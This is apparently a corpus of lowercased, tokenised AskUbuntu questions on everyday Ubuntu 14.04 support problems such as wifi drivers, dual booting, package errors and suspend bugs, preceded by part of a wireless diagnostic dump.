/lib/modules/3.13.0-34-generic/kernel/drivers/net/wireless/rt2x00/rt2800usb.ko firmware : rt2870.bin version : 2.3.0 srcversion : d6f814daf78f2bea3da12cb depends : rt2x00lib , rt2800lib , rt2x00usb parm : nohwcrypt : disable hardware encryption . ( bool ) [ rt2x00usb ] filename : /lib/modules/3.13.0-34-generic/kernel/drivers/net/wireless/rt2x00/rt2x00usb.ko version : 2.3.0 srcversion : 44768071492503f8efe1eed depends : rt2x00lib , mac80211 [ rt2800lib ] filename : /lib/modules/3.13.0-34-generic/kernel/drivers/net/wireless/rt2x00/rt2800lib.ko version : 2.3.0 srcversion : 9bd0087b6943a41e7fd8eda depends : rt2x00lib , mac80211 , crc-ccitt [ rt2x00lib ] filename : /lib/modules/3.13.0-34-generic/kernel/drivers/net/wireless/rt2x00/rt2x00lib.ko version : 2.3.0 srcversion : cc69ee39e7d673974a21c0a depends : mac80211 , cfg80211 [ mac80211 ] filename : /lib/modules/3.13.0-34-generic/kernel/net/mac80211/mac80211.ko srcversion : 8ada881d348148a3358334c depends : cfg80211 parm : max_nullfunc_tries : maximum nullfunc tx tries before disconnecting ( reason 4 ) . ( int ) parm : max_probe_tries : maximum probe tries before disconnecting ( reason 4 ) . ( int ) parm : beacon_loss_count : number of beacon intervals before we decide beacon was lost . ( int ) parm : probe_wait_ms : maximum time ( ms ) to wait for probe response before disconnecting ( reason 4 ) . ( int ) parm : ieee80211_default_rc_algo : default rate control algorithm for mac80211 to use ( charp ) [ cfg80211 ] filename : /lib/modules/3.13.0-34-generic/kernel/net/wireless/cfg80211.ko srcversion : e786d076b61f97809b04b64 depends : parm : ieee80211_regdom : ieee 802.11 regulatory domain code ( charp ) parm : cfg80211_disable_40mhz_24ghz : disable 40mhz support in the 2.4ghz band ( bool ) [ crc_ccitt ] filename : /lib/modules/3.13.0-34-generic/kernel/lib/crc-ccitt.ko srcversion : 2294fcad06d727386004eeb depends : udev rules ~~~~~~~~~~~~~~~~~~~~~~~~~ # pci device 0x10ec:0x8168 ( r8169 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac eth0 > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # usb device 0x:0x ( rt2800usb ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac wlan0 > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan0 '' custom files/entries ~~~~~~~~~~~~~~~ /etc/modules : default /etc/rc.local : default /etc/modprobe.d : not default /etc/pm/ ( cnf|pw|sl ) : default [ /etc/modprobe.d ] iwlwifi.conf : options iwlwifi 11n_disable=1 mlx4.conf : softdep mlx4_core post : mlx4_en kernel boot line ~~~~~~~~~~~~~~~~~~~ boot_image=/boot/vmlinuz-3.13.0-34-generic root=uuid=758c9891-4c05-4596-9083-f799581dc1d8 ro quiet splash vt.handoff=7 dmesg ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [ 0.433570 ] microcode : microcode update driver : v2.00 < tigran @ aivazian.fsnet.co.uk > , peter oruba [ 0.433771 ] audit : initializing netlink socket ( disabled ) [ 0.694234 ] r8169 gigabit ethernet driver 2.3lk-napi loaded [ 10.255221 ] ieee80211 phy0 : rt2x00_set_rt : info - rt chipset 5390 , rev 0502 detected [ 10.283322 ] ieee80211 phy0 : rt2x00_set_rf : info - rf chipset 5370 detected [ 15.248447 ] init : network-manager main process ( 852 ) terminated with status 127 [ 15.248457 ] init : network-manager main process ended , respawning [ 16.236485 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 24.173407 ] ieee80211 phy0 : rt2x00lib_request_firmware : info - loading firmware file 'rt2870.bin' [ 24.205183 ] ieee80211 phy0 : rt2x00lib_request_firmware : info - firmware detected - version : 0.29 [ 24.438982 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 35.087206 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 36.177441 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 38.186311 ] wlan0 : authenticate with < mac c-01 nehtgaer > [ 38.208811 ] wlan0 : send auth to < mac c-01 nehtgaer > ( try 1/3 ) [ 38.210285 ] wlan0 : authenticated [ 38.210322 ] wlan0 : deauthenticating from < mac c-01 nehtgaer > by local choice ( reason=3 ) [ 38.214082 ] wlan0 : associate with < mac c-01 nehtgaer > ( try 1/3 ) [ 38.217397 ] wlan0 : rx assocresp from < mac c-01 nehtgaer > ( capab=0x421 status=0 aid=1 ) [ 38.224128 ] wlan0 : associated [ 38.224152 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready ======== done ========
513382	cursor problem - please help !	i changed my cursor but it only appears in firefox 's window . on desktop or anywhere else there is a small red cursor is showing . i cant change , i tried everything . chmod 755 does n't work neither . please help ! *sorry for the bad english
513387	is hp proliant bl660c gen8 ubuntu server certified ?	need help to determine if the hp proliant bl660c gen8 hardware is ubuntu server certified and/or will be reviewed to be certified soon .
513389	moving a vm from virtualbox to vmware player	can i export a vm created on virtualbox ( see the environment described here ) and import it to a vmware player system and run it without having troubles later ? i came accross this article but it does not respond to my question .
513391	how to change language	after the new update my laptop was set on sanskrit and i can not change it back please tell the way to change it to english . i tried to change it by seeing all settings
513394	launchpad qt/c++ and external tools	i 'm new to ubuntu developpement and searching for information regarding building apps through launchpad ( using recipes ) . i have a project of building a qt5/c++ webkit app and wanted to ask : how to use external tools in the build process ? let 's say i wanted to use grunt to concatenate and minify js and css files prior of building the app . how to proceed ? thank you .
513395	mouseless clipboard manager	there are a lot of clipboard managers available , but i search one which can be used without using the mouse . has someone a recommendation for me ?
513396	overclocking monitor refresh rate on ubuntu	i have a qnix qx2710 monitor which was overclocked to a 96hz refresh rate when i ran windows . now that i 've moved over to linux i 'd like to overclock the refresh rate again but i do n't know how . i have a radeon r9 290 video card and i 'm using the propitiatory amd catalyst drivers from the amd website . do i just need to edit my xorg.conf file to specify a certain refresh rate ? i found this modeline generator online , if i plug in my monitors resolution and desired refresh rate is this likely to work ? does anyone have experience doing this with a radeon card ? i 'm running ubuntu 14.04 if it helps .
513397	install node on ubuntu 14.04 1and1 virtual server	i have a virtual server from 1and1 running ubuntu 14.04 . after correcting the /etc/apt/sources.list to the official ones i tried to install nodejs and npm ( to install bower later ) . i followed the guide availabe under https : //www.digitalocean.com/community/tutorials/how-to-install-node-js-on-an-ubuntu-14-04-server . everything worked fine until i wanted to install npm . the latest version of nodejs is already installed : root @ somewhere : ~ # node -- version v0.10.30 when i try to install npm i get the following error : root @ somewhere : ~ # apt-get install npm reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : npm : depends : nodejs but it is not going to be installed depends : node-abbrev ( > = 1.0.4 ) but it is not going to be installed depends : node-ansi but it is not going to be installed depends : node-archy but it is not going to be installed depends : node-block-stream but it is not going to be installed depends : node-fstream ( > = 0.1.22 ) but it is not going to be installed depends : node-fstream-ignore but it is not going to be installed depends : node-github-url-from-git but it is not going to be installed depends : node-glob ( > = 3.1.21 ) but it is not going to be installed depends : node-graceful-fs ( > = 2.0.0 ) but it is not going to be installed depends : node-inherits but it is not going to be installed depends : node-ini ( > = 1.1.0 ) but it is not going to be installed depends : node-lockfile but it is not going to be installed depends : node-lru-cache ( > = 2.3.0 ) but it is not going to be installed depends : node-minimatch ( > = 0.2.11 ) but it is not going to be installed depends : node-mkdirp ( > = 0.3.3 ) but it is not going to be installed depends : node-gyp ( > = 0.10.9 ) but it is not going to be installed depends : node-nopt ( > = 2.1.1 ) but it is not going to be installed depends : node-npmlog but it is not going to be installed depends : node-once but it is not going to be installed depends : node-osenv but it is not going to be installed depends : node-read but it is not going to be installed depends : node-read-package-json ( > = 1.1.0 ) but it is not going to be installed depends : node-request ( > = 2.25.0 ) but it is not going to be installed depends : node-retry but it is not going to be installed depends : node-rimraf ( > = 2.2.2 ) but it is not going to be installed depends : node-semver ( > = 2.1.0 ) but it is not going to be installed depends : node-sha but it is not going to be installed depends : node-slide but it is not going to be installed depends : node-tar ( > = 0.1.18 ) but it is not going to be installed depends : node-which but it is not going to be installed e : unable to correct problems , you have held broken packages . yes , i ran apt-get update several times . does anybody know how to fix this ? root @ somewhere : ~ # lsb_release -rc release : 14.04 codename : trusty
513398	unable to execute binary file . exec format error	i recently heard about breach , a node.js based browser . i was following the instructions on http : //codeforgeek.com/2014/08/download-install-breach-browser-ubuntu-14-04/ to install it but got the following error : breach-v0.3.22-alpha.6-linux-x64/__auto_update_bundle__/exo_browser/exo_browser : can not execute binary file : exec format error after some googling , i found that it is because i am trying to install the 64 bit package on the 32 bit ubuntu installation . i tried to find 32 bit package of the same but ended up with no luck . the browser is only available in 64 bit packet ( as far as i know ) . so , my question is : is it possible to somehow install it on the 32 bit os or if any program available which can run 64 bit applications on the 32 bit os . i have been googling around and found no help . can anyone help me ? i am using ubuntu 14.04 ( 32 bit ) . thank you
513400	failed ubuntu-windows8 dual boot : is uninstalling ubuntu the answer ?	i have an acer aspire e1-472g with windows 8.1 so after installing ubuntu , something went wrong and i could not boot into windows8.1 and i can not access my files in any drive except for my ubuntu drive . i 'm thinking i 'll remove the ubuntu os for now . can this solve my problem ? will i be able to boot into windows again ? i found instructions online on how to remove ubuntu https : //help.ubuntu.com/community/os-uninstaller
513403	lubuntu light locker settings incorreectly starts power saving mode	in lubuntu 14.04 64-bit on a desktop computer , my monitor goes to power saving mode almost immediately after the blank screen has appeared , regardless of the light locker settings . i do not want the display to be switched off that soon . with the settings illustrated by the screenshot below , my monitor goes to power saving mode after only a couple of minutes of inactivity . is the light locker buggy or have i misunderstood the settings ?
513404	cisco am10 usb wireless adapter not recognized on ubuntu 14.04	i recently updated ( and also tried a fresh install ) of the most recent ubuntu os for my dell optiplex . my usb adapter worked fine before the update . now the adapter is not working / recognized . what has changed with the update ? do i need to install a driver ? if so , can u give me some hints on how to do it ( sorry , i 'm a newb to linux ) ?
513405	vboxmanage works only with sudo	i cant list all vms without sudo : vboxmanage list vms shows nothing , but when i try this : sudo vboxmanage list vms it shows all vms . i 've installed virtualbox with following command : sudo apt-get install virtualbox is that normal behavior ?
513406	install ubuntu touch for galaxy tab 3	i have a galaxy tab 3 sm-t210r tablet and i really enjoy using the ubuntu desktop and would like to to start using the touch version for the tablet . eventually using it on the phone as well . has anyone done it and is it worth the install and if so where can i can get the download and install procedure .
513408	how to launch a vm inside a vmware player with a shell script ?	i am forced to use vmware player instead of virtualbox , so i wonder what is the answer for the same question ( similar to this one ) as this but in the context of a vmware player ?
513409	reading xfs data , hard drive issues	i recently had an issue were i could not read 2 formatted xfs hard drives ( exact same model seagate ) one i used ubuntu live cd to mount and copy the data to a new hard drive . this worked successfully with no issues . on the second drive this would not work . i tried the ubuntu live cd and then knoppix . both complained about super block errors ( this was an issue on both drives ) on the second drive i tried to run the xfs repair but it failed to resolve the issue . i decided to look for an alternative app where i could copy my data successfully . i used ufs explorer , this worked successfully but i had to restart the copy one time . in the end i got most of my data back but i think i have some files that got corrupted . i scanned the drive a bit but have n't fully checked for bad files . originally when i tested both drives with seagate tools , they both reported issues . i suspected that my motherboards controller was gone because i had other issues during post . so my thought is the seagate errors could be from the controller issues , i test them now through a usb dock and the test short and short generic were successful . my question is could the data on an xfs drive be that bad off that it would make the hard drive hard to read ? ? ? i reformatted the drives with ntfs and tested them again with seagate tools , both tested successful . any ideas why i had such a hard time reading them in linux when the drives ( so far ) seemed to be healthy ? i most likely wo n't be using xfs with linux in the near future . i have another seagate that was formatted in xfs but i think that drive was not in the machine when i was experiencing issues . for now i need to leave that drive xfs ( one drive ) . thanks
513412	boot xen under uefi-only bios	is there a way to get xen 4.4 booting from uefi mode bios ? my amd64bit laptop does not support direct csm/legacy boots . a nasty workaround has been to boot from a specially made usb pendrive with grub-efi-amd64-signed , which has proven problematic . linux kernel 3.16.0-9-generic # 14-ubuntu smp x86_64 x86_64 gnu/linux itself boots fine , except that it refuses to load the listed xen kernels/hypervisors and loops right back to the grub menu if tried . beware there seems to be no clear information from xenproject about efi status , but through much blood and error it seems unsupported . this is the problem preventing my xen-enabled kernel from loading : loading xen 4.4-amd64 ... error : secure boot forbids loading module from ( hd0 , gpt5 ) /boot/grub/x86_64-efi/multiboot.mod
513413	suspend error on 14.04 lts	i 've looked around and seems like various problems around suspend are wide spreaded for 14.04 release , nevertheless i have n't seen exactly my problem reported , nor my laptop model mentioned . so , the problem . when i press sleep button system seems to be going into suspend , i.e . screen goes black , it stops responding on the keyboard and wireless leds turn off , however the power led does n't go into suspend state and cpu fan also keeps spinning . but unlike the other problem described here https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/1315435 when i close the lid and reopen it - system wakes up and goes back to normal locked screen state , so reboot is not needed . system details : this is a clean freshly installed ubuntu 14.04 , 32bit laptop dell d630 kernel 3.13.0-34-generic
513415	ubuntu 14.04 sudo issue	i have just installed 14.04 on my computer , there 's nothing in that pc then os and default packages and i 'm the only user on machine . when i try to use sudo ( to install some programs ) i ca n't login with my password . i guess it 's something essential that i 'm missing but i ca n't find out what 's that..
513417	unable to locate package ia32-libs-gtk	after having successfully installed cisco packet tracer , i can not make it work . i 'm trying hard to install ia32-libs and i 'm receiving this message : $ sudo apt-get install ia32-libs reading package lists ... done building dependency tree reading state information ... done e : unable to locate package ia32-libs i 've even tried to locate it by using the cd command !
513419	how do you install .exe file without wine	okay here is the situation . i received a computer from my dad he had installed ubuntu . when he gave it to me he said there was no password.it keeps asking me for password but i do n't know it and my dad does n't remember installing a password . so i decided to try to re-install ubuntu , but the computer wont open .exe files . i cant install wine because it asks me for a password i do n't have any help would be needed . i am trying to install ubuntu if that helps .
513420	how to kill and alternate x session via cli	can someone tell me how to remove dormant x sessions . this question is similar to logging out other users from the command line , but more specific to controlling x displays which i find hard to kill . i used the command `` who -u '' to get the session of the other screens : $ who -u which gave me : user1 :0 2014-08-18 12:08 ? 2891 ( :0 ) user1 pts/26 2014-08-18 16:11 17:18 3984 ( :0 ) user2 :1 2014-08-18 18:21 ? 25745 ( :1 ) user1 pts/27 2014-08-18 23:10 00:27 3984 ( :0 ) user1 pts/32 2014-08-18 23:10 10:42 3984 ( :0 ) user1 pts/46 2014-08-18 23:14 00:04 3984 ( :0 ) user1 pts/48 2014-08-19 04:10 . 3984 ( :0 ) the kill -9 25745 does n't appear to do anything . i have a workshop where a number of users will use the computer under their own login . after the workshop is over there are a number of logins that are left open . i would prefer to kill the open sessions rather than try to log into each users ' screen . again , this question is n't just about logging users ' out . i 'm hoping to get clarity also for killing/removing stuck processes that are hard to kill . new info while still pondering how to kill the process i wrote the following script , which did it : # ! /bin/bash results=1 while [ [ $ results > 0 ] ] do sudo kill -9 25745 results= $ ? echo -ne `` response : $ results ... '' sleep 20 done after a graceful waiting period , if there is n't a better answer i 'll mark this as answered with this resolution . this may resolve the problem with other stuck processes i have had in the past .
513422	glibc reinstallation with new kernel	recently i removed some old kernel with autoremove function . but later found that i am getting error in configuring linux kerel . also i googled and got that linux-libc-dev depends on old kernel headers which i removed . i dont remember what version i removed . please guide me how can i get it back or reinstall linux-libc-dev package with my new kernel . i am using ubuntu 12.04 with 3.13.0-34 kernel and the linux-libc-dev is some 3.2.0-67 version.. i tried installing headers of linux-kernel 3.2.0-67 but its is not helping i am getting error as fixdep.c : ( .text+0x32e ) : undefined reference to __ctype_b' fixdep.c : ( .text+0x3a5 ) : undefined reference to__ctype_b' fixdep.c : ( .text+0x5cf ) : undefined reference to __stdout' fixdep.c : ( .text+0x605 ) : undefined reference to__fputc_unlocked'
513424	fullscreen is black with fontconf warnings after updating ubuntu	after having upgraded ubuntu , i had the problem where ubuntu was stuck in a login loop . to try fix it , i used commands from this forum : ubuntu gets stuck in a login loop . now , when i try to start up ubuntu , where the login screen would usually appear , i have a full black screen with white fontconfig warnings : # fontconfig warning : `` /etc/fonts/conf.d/50-user.conf '' , line 9 : reading configurations from ~/.fonts.conf is deprecated . # fontconfig warning : `` /etc/fonts/conf.d/65-droid-sans-fonts.conf '' , line 61 : having multiple values in < test > is n't supported and may not works as expected # fontconfig warning : `` /etc/fonts/conf.d/65-droid-sans-fonts.conf '' , line 96 : having multiple values in < test > is n't supported and may not works as expected # fontconfig warning : `` /etc/fonts/conf.d/89-tlwg-garuda-synthetic.conf '' , line 9 : having multiple values in < test > is n't supported and may not works as expected # fontconfig warning : `` /etc/fonts/conf.d/89-tlwg-garuda-synthetic.conf '' , line 21 : having multiple values in < test > is n't supported and may not works as expected # fontconfig warning : `` /etc/fonts/conf.d/89-tlwg-kinnari-synthetic.conf '' , line 9 : having multiple values in < test > is n't supported and may not works as expected # fontconfig warning : `` /etc/fonts/conf.d/89-tlwg-kinnari-synthetic.conf '' , line 21 : having multiple values in < test > is n't supported and may not works as expected # fontconfig warning : `` /etc/fonts/conf.d/89-tlwg-loma-synthetic.conf '' , line 12 : having multiple values in < test > is n't supported and may not works as expected # fontconfig warning : `` /etc/fonts/conf.d/89-tlwg-umpush-synthetic.conf '' , line 9 : having multiple values in < test > is n't supported and may not works as expected # fontconfig warning : `` /etc/fonts/conf.d/89-tlwg-umpush-synthetic.conf '' , line 21 : having multiple values in < test > is n't supported and may not works as expected # fontconfig warning : `` /etc/fonts/conf.d/90-fonts-baekmuk.conf '' , line 10 : having multiple values in < test > is n't supported and may not works as expected # fontconfig warning : `` /etc/fonts/conf.d/90-fonts-baekmuk.conf '' , line 23 : having multiple values in < test > is n't supported and may not works as expected # fontconfig warning : `` /etc/fonts/conf.d/90-fonts-nanum.conf '' , line 9 : having multiple values in < test > is n't supported and may not works as expected # fontconfig warning : `` /etc/fonts/conf.d/90-fonts-nanum.conf '' , line 22 : having multiple < family > in < alias > is n't supported and may not works as expected # fontconfig warning : `` /etc/fonts/conf.d/90-fonts-nanum.conf '' , line 22 : having multiple < family > in < alias > is n't supported and may not works as expected # fontconfig warning : `` /etc/fonts/conf.d/90-fonts-nanum.conf '' , line 22 : having multiple < family > in < alias > is n't supported and may not works as expected # fontconfig warning : `` /etc/fonts/conf.d/90-fonts-nanum.conf '' , line 26 : having multiple < family > in < alias > is n't supported and may not works as expected # fontconfig warning : `` /etc/fonts/conf.d/90-fonts-nanum.conf '' , line 31 : having multiple values in < test > is n't supported and may not works as expected # fontconfig warning : `` /etc/fonts/conf.d/90-fonts-nanum.conf '' , line 40 : having multiple values in < test > is n't supported and may not works as expected # fontconfig warning : `` /etc/fonts/conf.d/90-fonts-unfonts-core.conf '' , line 11 : having multiple values in < test > is n't supported and may not works as expected i do have access to a full screen command-line . many people suggested the commands : mkdir -p $ home/.config/fontconfig mv $ home/.fonts.conf $ home/.config/fontconfig/fonts.conf ; however , it says mv : can not stat '.fonts.conf ' : no such file or directory . i also tried editing the /etc/fonts/conf.d/50-user.conf file as root : s udo nano /etc/fonts/conf.d/50-user.conf and changed the line that says < include ignore_missing= '' yes '' deprecated= '' yes '' > ~/.fonts.conf < /include > to < ! -- < include ignore_missing= '' yes '' deprecated= '' yes '' > ~/.fonts.conf < /include > -- > i rebooted ubuntu and the same fontconfig errors are present . how do i fix this bug ? thanks in advance
513425	how to get wifi working on ubuntu 14.04 ( macbook pro retina 15 inch - 2014 )	i just downloaded ubuntu 14.04 on my macbook pro retina 15 inch 2014 version using usb . my problem is i ca n't get the wifi working . no wifi connections would display on the wifi menu . i 've tried searching for solutions all over the internet , but i could only find one solution , and that was using the ethernet cable and downloading external software . problem is , i currently do n't have an ethernet cable , nor do i have a port to connect the ethernet cable ( i live in a dorm ) . basically , i have no way to connect to ethernet cable , yet need the wifi . is there any way i could download the wifi driver probably using sudo-apt get ? please help me out . thanks in advance .
513426	make win7 bootable after ubuntu/kubuntu install	i had a win7 install on a raid array ( sda ... ) and added a second drive ( sdf ) for installing linux . installed ubuntu initially using a grub boot loader ( no problem , win7 still bootable ) , but then decided to wipe and replace with kubuntu . it had some error during the install . ( i think it messed with the sda boot loader even though the os was installed to sdf . why it did n't seem to ask where i wanted grub , i have no idea . ) now i 've restored grub to boot to kubuntu on the new drive ( using boot-repair , i did n't select 'restore mbr ' , was that wrong ? ) , but i ca n't get the win7 install option back . i 've tried using sudo update-grub but still no win7 option . now when i boot with an ubuntu usb , i no longer see the `` install alongside another '' option which worked the first time when win7 was still bootable . what 's the least painful way of restoring win7 so it can boot ?
513429	distribution upgrade ( 12.04 - > 14.04 lts ) halted while unpacking/installing packages	as the title states ... it just stopped unpacking/installing . `` preparing to unpack ... /lirc_0.9.0-0ubuntu5_amd64.deb ... '' then stopped in its tracks . everything else is still running . the update manager process is still alive ; if i hit ctrl-c , it gives me the warning message about leaving the system in a broken state . also , if i run top , there is a process called `` trusty '' which is still running . i have not killed either process . lsb_release -a gives : lsb version : core-2.0-amd64 : core-2.0-noarch : core-3.0-amd64 : core-3.0-noarch : core-3.1-amd64 : core-3.1-noarch : core-3.2-amd64 : core-3.2-noarch : core-4.0-amd64 : core-4.0-noarch distributor id : ubuntu description : ubuntu 14.04.1 lts release : 14.04 codename : trusty i assume that if i try to restart update-manager , i wo n't be offered the option to upgrade again . anyone have a way i can get the update-manager/dist-upgrade process to simply finish the upgrade ? thanks !
513432	unable to view gui in ubuntu 14.04do	i am unable to view the gui in ubuntu 14.04 . i followed the previous answers but , i am not able to run the given command too . the sudo command is not found . i am not able to install the sudo too . i am in ( initramfs ) please do help me here . thanks
513435	accessing shared folder between windows 7 and ubuntu vm from the vm ?	i set a shared folder between my ubuntu vm ( on virtualbox ) and windows 7 host machine correctly . now i have no idead how to access the shared folder from my vm . any idea ? i tried the solution one could understand as shown on this picture . each time i type the password of the host machine i got prompted to type it again and again :
513438	upgrade to 14.04 broke gsettings	i have a cron job which runs every 30 minutes that changes the background image by running this bash script : # ! /bin/bash export display=:0 export gsettings_backend=dconf wpdir= '' /home/username/pictures/wallpapers/ '' prefix= '' file : // '' file=`ls $ wpdir | shuf -n 1` gsettings set org.gnome.desktop.background picture-uri `` $ prefix $ wpdir $ file '' this worked perfectly until i upgraded to 14.04 . now , running the script produces this output : ( process:27459 ) : dconf-warning ** : failed to commit changes to dconf : could not connect : connection refused what can i do to fix this ? google did n't turn up any useful results . edit : i noticed that running this does change the background displayed on the lock screen , but it does not affect the desktop background .
513442	can two pcs with ubuntu share the clipboard buffer ?	i need to copy text on the first pc and paste on the second . is this possible ?
513444	i ca n't format my flash drive	i 'm trying to format my flash drive via disks : but every time i get this error : what should i do ? thanks !
513447	can i still use unity low graphics mode in place of unity 3d ?	i can not run unity 3d on my chromebook but unity 2d in ubuntu 12.04 works fine so is it possible to run unity low graphics mode on ubuntu 14.04 as an alternative ? if i can run low graphics mode as an alternative then how would i go about that ? if i can not then what would be a good unity like alternative for ubuntu 14.04 ? i have tested these de 's on ubuntu 14.04 on my chromebook : lxde : works fine xfce : works fine gnome : does not work at all unity : does not work at all kde : have not yet tested this de i am using crouton to install unity and according to the maker ( s ) of this script say that unity 3d will not work for me as it requires hardware acceleration that my chromebook does not offer . what happens when i run unity 3d is a black/gray screen followed by a complete lockup of ubuntu that i must terminate from crosh ( the chromebooks developer console that ubuntu is running in ) . this is the modified target script that i am using with crouton to install unity 3d on samsung arm chromebook ( please note that it is not yet fully functional ) . # ! /bin/sh -e # copyright ( c ) 2014 the crouton authors . all rights reserved . # use of this source code is governed by a bsd-style license that can be # found in the license file . requires='gtk-extra' description='installs the unity desktop environment . ( approx . 700mb ) ' hostbin='startunity' chrootbin='startunity gnome-session-wrapper crouton-unity-autostart' chrootetc='unity-autostart.desktop unity-profiled' . `` $ { targetsdir : = '' $ pwd '' } /common '' # # # append to prepare.sh : install ubuntu-desktop ubuntu-artwork gnome-session nautilus \ ubuntu-settings , ubuntu~precise= \ ubuntu-session , ubuntu~precise+ubuntu~quantal+ubuntu~raring+ubuntu~saucy+ubuntu~trusty= \ -- network-manager # xdg autostart/profile.d additions only needed in saucy and later if release -ge saucy ; then autostartdir='/etc/xdg/autostart' # remove previous indicator-only desktop file rm -f `` $ autostartdir '' /crouton-unity-indicator.desktop # set up global autostart script mkdir -p `` $ autostartdir '' ln -sft /etc/crouton/unity-autostart.desktop \ `` $ autostartdir '' /crouton-unity-autostart.desktop # set up profile.d chmod 755 /etc/crouton/unity-profiled ln -sft /etc/crouton/unity-profiled /etc/profile.d/crouton-unity-profiled.sh fi if release -ge trusty ; then autostartdir='/etc/xdg/autostart' # remove previous indicator-only desktop file rm -f `` $ autostartdir '' /crouton-unity-indicator.desktop # set up global autostart script mkdir -p `` $ autostartdir '' ln -sft /etc/crouton/unity-autostart.desktop \ `` $ autostartdir '' /crouton-unity-autostart.desktop # set up profile.d chmod 755 /etc/crouton/unity-profiled ln -sft /etc/crouton/unity-profiled /etc/profile.d/crouton-unity-profiled.sh fi tips= '' $ tips you can start unity via the startunity host command : sudo startunity '' the current problem with this script is that i need to implement unity low graphics mode right into it on install and i can not figure out how to do that . if you would like to test the script with crouton then follow these steps : fist save the script as an extensionless file under the name `` unitylowg '' in the downloads directory of chrome os . then meet its dependencies by running these scripts one by one : sudo sh -e ~/downloads/crouton -t core -r trusty sudo sh -e ~/downloads/crouton -t audio -r trusty -u sudo sh -e ~/downloads/crouton -t xephyr -r trusty -u sudo sh -e ~/downloads/crouton -t x11 -r trusty -u sudo sh -e ~/downloads/crouton -t gtk-extra -r trusty -u then finally run the script with the following : sudo sh -e ~/downloads/crouton -t ~/downloads/unitylowg -r trusty -u
513451	hdmi sound out only sends left speaker	i have my 14.04 machine hooked up to my sony bravia tv via hdmi . when i tests the left and right speaker i only get a sound when i click on the left speaker . my tv has stereo output to my amp so sound comes out both speakers but only in mono . what checks can i do to see if the hdmi output is working correctly ?
513452	help with two mini-bugs	let 's see if someone can help me with two mini-bugs i have : sometimes , when i close the laptop and later open it , the touchpad stops working properly . most times it only acts fuzzy a few seconds and then starts working fine , but other times it stops working completely ( i ca n't move the mouse arrow , althougt clicking buttons work fine ) until i restart . whenever i turn on the computer , some keys excange with others ( `` becomes @ , ? becomes _ , 多 becomes + , etc ) , and i have to go to keyboard input and add and delete some language ( i use afgan because it 's the first ) thanks .
513458	using pipes in nautilus-actions	i do n't know if this is a valid question , i want to make links from selected files in nautilus and move the link files to the desktop , but piping commands does n't work . my combination in `` path '' field on `` command '' tab is : link % b `` link to `` % b | mv * ~/desktop i do n't know what i 'm missing .
513459	*.desktop files opening in kate	i 've downloaded and am playing with the new neon release of kde . when i activate an item from the kickoff menu , though , it opens up a *.desktop file in the kate text editor instead of launching the item . what 's the issue ?
513460	static ip breaks network connection	i am somewhat new to linux . i am setting up a web server and installed ubuntu server 14.04 on an vsphere esxi 5.5 host . i am connecting perfectly fine to the internet when using dhcp but when i apply my static settings i loose the ability to connect to websites . whats weird is i can ping google.com but if i try wget gooogl.com it hangs at connecting to google.com ( google.com ) :173.194.43.32:80 and i get `` failed : connection refused '' but if i am set to dhcp the connection resolves perfectly . thanks # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 # iface eth0 inet dhcp iface eth0 inet static address 10.1.2.25 gateway 10.1.2.2 netmask 255.255.255.0 search tsig.com dns-nameservers 10.1.2.13 10.1.2.30
513461	preseed values for keyboard-configuration	i 'd like to activate ctrl+alt+backspace on multiple pcs ( ubuntu 14.04 ) using dpkg-reconfigure keyboard-configuration i do n't want to do the dialog every time so i tried : debconf-get-selections | grep `` ^keyboard-configuration '' > config.dat on a host where i answered the dialog with the desired answers on the host where i want to do it non interactively i tried : debconf-set-selections config.dat dpkg-reconfigure -f noninteractive keyboard-configuration it ran without asking , but afterwards the selections where reset to the default values how can i get dpkg to use my predefined values ? or is there another possibility to enable the ctrl+alt+backspace for all users without going through dialogs ? edit to summarize : my problem is that dpkg-reconfigure -f noninteractive keyboard-configuration does n't seem to respect my preseeded selections . can anyone find something wrong in the procedure how i try to do it or could this be a bug ?
513462	gnome fallback move to workspace not working - ubuntu 14.04	i have recently switched to ubuntu 14.04 but using the gnome fallback desktop environment . the thing that is not working for me is that when i right click on a window 's top bar and then click move to workspace up for example , it puts the window in that workspace but it also keeps it in the current workspace . i 've tried all options but it just would n't work : ( anyone experienced the same and found a solution ?
513464	booting an installed ubuntu in an usb from windows 8.1	so i have bought an asus transformer pad t100 and it contains windows 8.1 . it also has a micro sd card slot that contains a 16gb micro sd card . so i have installed ubuntu on the card and now is it possible to boot to that micro sd card ? if it 's possible then how ? p/s : i tried go to the bios menu and it did n't show the sd card sadly d :
513467	is there a way to mirror directory changes in terminator ?	i 'm on ubuntu 12.04 and am using terminator as my primary terminal . i like it because it lets me keep a python interpreter and bash terminal open at the same time , in the same view . what is annoying is that i end up moving between directories a lot , and then i have to do it twice . is there a way to set up a terminator configuration to do that ? to have terminator mirror directory changes . i 'm guessing i 'm not the only one that finds that frustrating !
513469	audio controls in xfce 4.8	i am seeing several questions similar to mine , but none of the answers are sufficient . i am pretty green with ubuntu , so here goes : i was just automatically upgraded to xfce 4.8 for ubuntu studio . the volume control no longer works in my panel . when i launch 'mixer ' i do n't see any settings , either . when i try to run `` linux audio configuration '' i get an error : jack can only be configured with a loaded and stopped studio . please create a new studio or load and stop an existing one . i understand that i can change the volume using command line , but i ca n't understand why i got upgraded to something that fails on basic features . i much less likely to recommend ubuntu to others as a result . thanks !
513470	ubuntu wakes up at once in suspend after 12.04 hardware update	i have laptop acer aspire and ubuntu 12.04 . a few day ago i 've installed hardware update from update manager . after this update my laptop wakes up after suspend at once . but there is not any problem with suspend in windows 8 on this laptop . what should i do ?
